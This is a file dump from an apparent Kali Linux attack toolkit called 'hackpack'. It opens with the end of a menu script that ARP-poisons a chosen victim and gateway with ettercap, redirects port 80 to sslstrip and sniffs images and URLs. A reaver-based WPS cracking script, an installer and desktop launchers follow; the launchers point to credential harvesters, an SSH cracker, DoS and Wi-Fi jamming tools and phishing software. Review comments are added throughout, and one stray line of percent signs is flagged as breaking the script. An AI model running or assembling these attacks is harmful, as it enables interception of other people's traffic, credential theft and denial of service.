sudo xterm -e driftnet -i $IFACE &


# Start urlsnarf in its own xterm on the chosen interface.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect inbound TCP port 80 to local port 8080 (where sslstrip listens).
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


# Start ettercap with the typed gateway and host as the two targets.
ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &


# Start sslstrip on port 8080; unlike the other branches, without sudo.
xterm -e sslstrip -a -l 8080 &

echo "Press ENTER to stop session"
read ENTERKEY

# Cleanup: see the header notes; this flushes all iptables rules.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
else

# ---- Option 4: gateway and a single host, ettercap bound to $IFACE ----
if [ $menuoption = "4" ]; then
# Show the detected gateway, then ask for gateway and host addresses.
echo ""
echo ""
echo "This should be your Gateway from what I see: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo ""
echo ""
echo "Please type the IP of your gateway in below";
read GATEWAY4;
echo ""
echo ""
echo "Please type the IP of the target host below";
read HOST4;
echo ""
echo ""
echo " Starting Attack on Target Host"
sleep 2


# Enable IPv4 packet forwarding on this host.
echo "1" > /proc/sys/net/ipv4/ip_forward


# Start driftnet in its own xterm on the chosen interface.
sudo xterm -e driftnet -i $IFACE &


# Start urlsnarf in its own xterm on the chosen interface.
sudo xterm -e urlsnarf -i $IFACE &


# Redirect inbound TCP port 80 to local port 8080 (where sslstrip listens).
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


# Start ettercap on $IFACE with the typed gateway and host as targets.
ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &


# Start sslstrip on port 8080 in its own xterm.
sudo xterm -e sslstrip -a -l 8080 &


echo "Press ENTER to stop session"
read ENTERKEY

# Cleanup: see the header notes; this flushes all iptables rules.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

fi
fi
fi
fi
279 |
280 |
--------------------------------------------------------------------------------
/hackpack/hackpack/webservmethod.sh:
--------------------------------------------------------------------------------
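#!/bin/bash
#
# Report how a web server on port 80 answers each of a fixed list of HTTP
# request methods.
#
# Usage:   webservmethod.sh HOST
# Output:  one line per method: the method name followed by any response
#          line containing "HTTP/1.1".
# Requires a netcat that supports `-q`.

if [[ -z "${1:-}" ]]; then
  printf 'Usage: %s HOST\n' "${0##*/}" >&2
  exit 2
fi

for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND; do
  printf '%s ' "$webservmethod"
  # The method and host are passed as printf arguments, never as part of the
  # format string, so a '%' or backslash in HOST cannot alter the request.
  # "$1" is quoted so the host is always a single word on nc's command line.
  printf '%s / HTTP/1.1\nHost: %s\n\n' "$webservmethod" "$1" \
    | nc -q 1 "$1" 80 \
    | grep "HTTP/1.1"
done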
10 |
--------------------------------------------------------------------------------
/hackpack/hackpack/wpabust.sh:
--------------------------------------------------------------------------------
#! /bin/bash
#WpaBust is a reaver automation script for kali-linux
#Authors: D4rk50ld13r & gh0std0g
#
# Flow, as listed: stop existing monitor/wireless interfaces with airmon-ng,
# start monitor mode on $wireless_interface, run wash for $wash_timeout seconds
# to list access points with WPS enabled, let the user pick one (or take the
# first), then start reaver against it.
#
# Defender's view: everything after the wash step depends on the access point
# advertising WPS; turning WPS off on the access point removes it from the list.

# NOTE(review): the next line is not a comment. The shell will try to execute
# it and print an error before continuing.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0

#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15

#Flag to allow user to choose target AP
allow_user_choice=1

#Delay between attack attempts
reaver_delay=0

#Check for root privileges
if (( EUID != 0 )); then
echo "This script needs root"
exit 1
fi

#Check for required commands
for command in airmon-ng wash reaver
do
if [[ -z $(which $command) ]]; then
echo "$command was not found"
echo "To install $command, you may follow this link"
echo "http://lmgtfy.com/?q=$command+installation"
exit 1
fi
done

echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"

#Check available interfaces and close previous monitor interfaces and wireless lan
# Interface names are taken from the first field of ifconfig output.
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
do
# `||` and `&&` between [[ ]] commands have equal precedence and group left to
# right, so this reads: (name matches "^mon*" OR name ends in 0) AND name is
# not eth0. As a regex, "^mon*" means "mo" followed by zero or more "n", so it
# matches any name beginning with "mo".
if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
echo "* Shutting down $interface"
airmon-ng stop $interface > /dev/null
fi
done

# The rest of the script assumes the new monitor interface is named mon0.
echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null

echo "Identifying WPS-enabled access points"
# NOTE(review): wash output goes to a fixed file name in the current directory
# while running as root; a mktemp-created file would avoid overwriting an
# existing file or following a pre-placed symlink.
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
# Skips the first two lines and keeps the sixth space-separated field of each
# remaining line -- presumably the network name column; confirm against the
# installed wash version's output layout.
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')

# NOTE(review): network names are chosen by whoever operates each access
# point, so $APs and $chosen_ap are untrusted input to a root script. They are
# expanded unquoted below (word splitting, globbing) and $chosen_ap is used as
# a grep pattern, where it is interpreted as a regular expression and may
# match more than one line.
if [[ -n $(echo $APs) ]]; then
if (( $allow_user_choice )); then
n=1
echo "The following access points were detected"
for ap in $APs
do
echo "* $n: $ap"
((n++))
done
read -p "Enter your choice: " choice
# After the loop n is one more than the number of entries listed, and there is
# no lower bound or numeric check on $choice before it reaches `head`.
if [[ $choice -le $n ]]; then
chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
echo "You have chosen $chosen_ap"
else
echo "Invalid choice!"
exit 1
fi
else
chosen_ap=$(echo "${APs}" | head -n1)
echo "Proceeding with choice 1: $chosen_ap"
fi
# Look the chosen name up again in the saved wash output to get its line.
tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
# The output file is removed on this path only; the "No networks found" and
# "Invalid choice!" paths leave it behind.
rm washOutput.txt
# Field 2 of that line is used as the channel and field 1 as the MAC address.
channel=$(echo $tempLine | cut -f2 -d' ')
mac_address=$(echo $tempLine | cut -f1 -d' ')
echo "Starting reaver"
echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
echo "AP name: $chosen_ap"
echo "Channel: $channel"
echo "MAC Address: $mac_address"
reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
else
echo "No networks found. Consider increasing the wash timeout. Terminating"
exit 1
fi
90 |
91 |
--------------------------------------------------------------------------------
/hackpack/install.sh:
--------------------------------------------------------------------------------
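#!/bin/bash
### Hackpack installer by reaperz73
#
# Copies the icons, menu definition, desktop-directory files, the hackpack
# script tree and the .desktop launchers into system locations. Needs write
# access to /usr/share, /etc/xdg and /opt.
#
# NOTE(review): the launchers installed here execute scripts from
# /opt/hackpack, several of them with root privileges. Keep that tree owned by
# root and not writable by other users, otherwise any local account able to
# edit a script there can run code as whoever clicks the launcher.

# Stop at the first failing step instead of continuing with a partial install.
set -euo pipefail

# Resolve sources relative to this script, not the caller's working directory,
# so the globs below cannot pick up files from an unrelated directory.
cd -- "$(dirname -- "$0")"

cp -- *.png /usr/share/icons
cp -- *.menu /etc/xdg/menus/applications-merged
cp -- *.directory /usr/share/desktop-directories
cp -r -- hackpack /opt/

# Replace any launcher set left by an earlier install.
rm -rf -- /usr/share/applications/hackpack
mkdir -- /usr/share/applications/hackpack

# Copy by path rather than `cd launchers` first: if the directory is missing
# this fails cleanly instead of copying *.desktop from the wrong place.
cp -- launchers/*.desktop /usr/share/applications/hackpack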
11 |
--------------------------------------------------------------------------------
/hackpack/launchers/911-AP.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=911-AP
4 | Type=Application
5 | Comment=911-AP by em3rgency
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./911_AP.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof;wireless
10 | GenericName=911-AP
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/Ghost_Phisher.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Ghost Phisher
3 | Version=1.0
4 | Exec=python /opt/Ghost-Phisher/ghost.py
5 | Comment=
6 | Icon=/opt/Ghost-Phisher/gui/images/icon.png
7 | Type=Application
8 | Terminal=false
9 | StartupNotify=true
10 | Encoding=UTF-8
11 | Categories=sniffspoof
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/Recon.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Recon
4 | Type=Application
5 | Comment=Recon
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./Recon.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Recon.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/admincp.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Admin CP Finder
4 | Type=Application
5 | Comment=Admin CP Finder
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;perl admin.pl;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Admin CP Finder
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/apfucker.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=AP-Fucker
4 | Type=Application
5 | Comment=AP-Fucker by MatToufoutu
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./AP_fucker.py;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=AP-Fucker
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/autosploit.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=autosploit
4 | Type=Application
5 | Comment=autosploit
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/SQL;perl autosploit.pl;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=database
10 | GenericName=autosploit
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/credhavester.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Cred-Harvester
4 | Type=Application
5 | Comment=Cred-Harvester
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./40_Cred_Harvester_1.4.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Cred-Harvester
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/easy-creds.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Easy-Creds
4 | Type=Application
5 | Comment=Easy-Creds
6 | Terminal=true
7 | Exec=sh -c "easy-creds;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Easy-Creds
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ejacoolas.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ejacoolas
4 | Type=Application
5 | Comment=ejacoolas
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ejacoolas.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=ejacoolas.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/enum.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=enum
4 | Type=Application
5 | Comment=enum
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./enum.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=enum
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/findhosts.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Find Hosts
4 | Type=Application
5 | Comment=Find Hosts
6 | Terminal=true
7 | Exec=sh -c "/opt/hackpack/Find_Hosts.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Find Hosts.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/googli.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Googli
4 | Type=Application
5 | Comment=Googli by xd00sry
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./googli.pl;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=Googli
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ipchecker.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ipchecker
4 | Type=Application
5 | Comment=ipchecker
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ipchecker.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=ipchecker.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/lazykali.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=LazyKali
4 | Type=Application
5 | Comment=LazyKali
6 | Terminal=true
7 | Exec=lazykali
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=LazyKali
11 |
--------------------------------------------------------------------------------
/hackpack/launchers/lbd.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Load Balancing Detector
4 | Type=Application
5 | Comment=Load Balancing Detector
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./lbd.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Load Balancing Detector
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/lrdos.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=LRDoS
4 | Type=Application
5 | Comment=LRDoS by R4V3N747700
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/ddos;./LRDoS.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=dos
10 | GenericName=LRDoS.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/macchanger.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=MACchanger
4 | Type=Application
5 | Comment=MACchanger by em3rgency
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./MACchanger.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=MACchanger
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/n1tr0g3n_ssl.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=n1tr0g3n_SSL
4 | Type=Application
5 | Comment=n1tr0g3n_SSL by n1tr0g3n
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./n1tr0g3n_SSL_BT-5.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=n1tr0g3n_SSL
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/passivefingerprint.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Passive Fingerprint
4 | Type=Application
5 | Comment=Passive Fingerprint
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./70_Passive_Fingerprint_1.2.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Passive Fingerprint
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/pwnstar.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=PwnStar
4 | Type=Application
5 | Comment=PwnStar
6 | Terminal=true
7 | Exec=sh -c "cd /opt/PwnSTAR_0.9;./PwnSTAR_0.9;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=PwnStar
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/readysethack.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=readysethack
4 | Type=Application
5 | Comment=readysethack by TH3CR4CK3R
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./readysethack.py;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=readysethack
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/recon-ng.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Recon-ng
4 | Type=Application
5 | Comment=Recon-ng
6 | Terminal=true
7 | Exec=sh -c "cd /opt/recon-ng;./recon-ng.py;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=Recon-ng
11 |
--------------------------------------------------------------------------------
/hackpack/launchers/slowloris.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Slowloris
4 | Type=Application
5 | Comment=Slowloris
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/ddos; echo type ./slowloris + options to use or perldoc slowloris.pl for help ;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=dos
10 | GenericName=Slowloris
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/smskiller.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=smskiller
4 | Type=Application
5 | Comment=smskiller
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./smskiller.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=smskiller
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/soundcloud.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=soundcloud
4 | Type=Application
5 | Comment=soundcloud
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./soundcloud.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=soundcloud
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ssh_crack3r..desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ssh_crack3r
4 | Type=Application
5 | Comment=ssh_crack3r by n1tr0g3n
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ssh_crack3r.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=ssh_crack3r
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/ssl_phucker.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=ssl_phucker
4 | Type=Application
5 | Comment=ssl_phucker by n1tr0g3n
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./ssl_phucker.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=ssl_phucker
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/subterfuge.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Subterfuge
4 | Type=Application
5 | Comment=Subterfuge
6 | Terminal=true
7 | Exec=sh -c "subterfuge;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Subterfuge
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/webservmethod.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=webservmethod
4 | Type=Application
5 | Comment=webservmethod
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./webservmethod.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=recon
10 | GenericName=webservmethod.sh
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/wifijammer.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=wifijammer
4 | Type=Application
5 | Comment=wifijammer
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack/ddos;./wifijammer_0.1.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=dos;wireless
10 | GenericName=wifijammer
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/wlm.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Wordlist Manipulator
4 | Type=Application
5 | Comment=Wordlist Manipulator
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./wlm;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=scripts
10 | GenericName=Wordlist Manipulator
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/wpabust.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=WpaBust
4 | Type=Application
5 | Comment=WpaBust by D4rk50ld13r & gh0std0g
6 | Terminal=true
7 | Exec=sh -c "cd /opt/hackpack;./wpabust.sh;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=wireless
10 | GenericName=WpaBust
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/launchers/yamas.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Yamas
4 | Type=Application
5 | Comment=Yamas
6 | Terminal=true
7 | Exec=bash -c "yamas;${SHELL:-bash}"
8 | Icon=elisa.png
9 | Categories=sniffspoof
10 | GenericName=Yamas
11 |
12 |
--------------------------------------------------------------------------------
/hackpack/lzdatabase.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Database
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzdos.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=DoS
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzhackpack.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Hackpack
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzhackscripts.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Scripts
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzrecon.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Recon
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzsniffspoof.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Sniffing/Spoofing
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lztools.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Tools
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/lzwireless.directory:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=Wireless
3 | Type=Directory
4 | Icon=bug.png
5 |
--------------------------------------------------------------------------------
/hackpack/myhackpack.menu:
--------------------------------------------------------------------------------
1 |
3 |
4 |
80 |
81 |
82 |
83 |
84 |
--------------------------------------------------------------------------------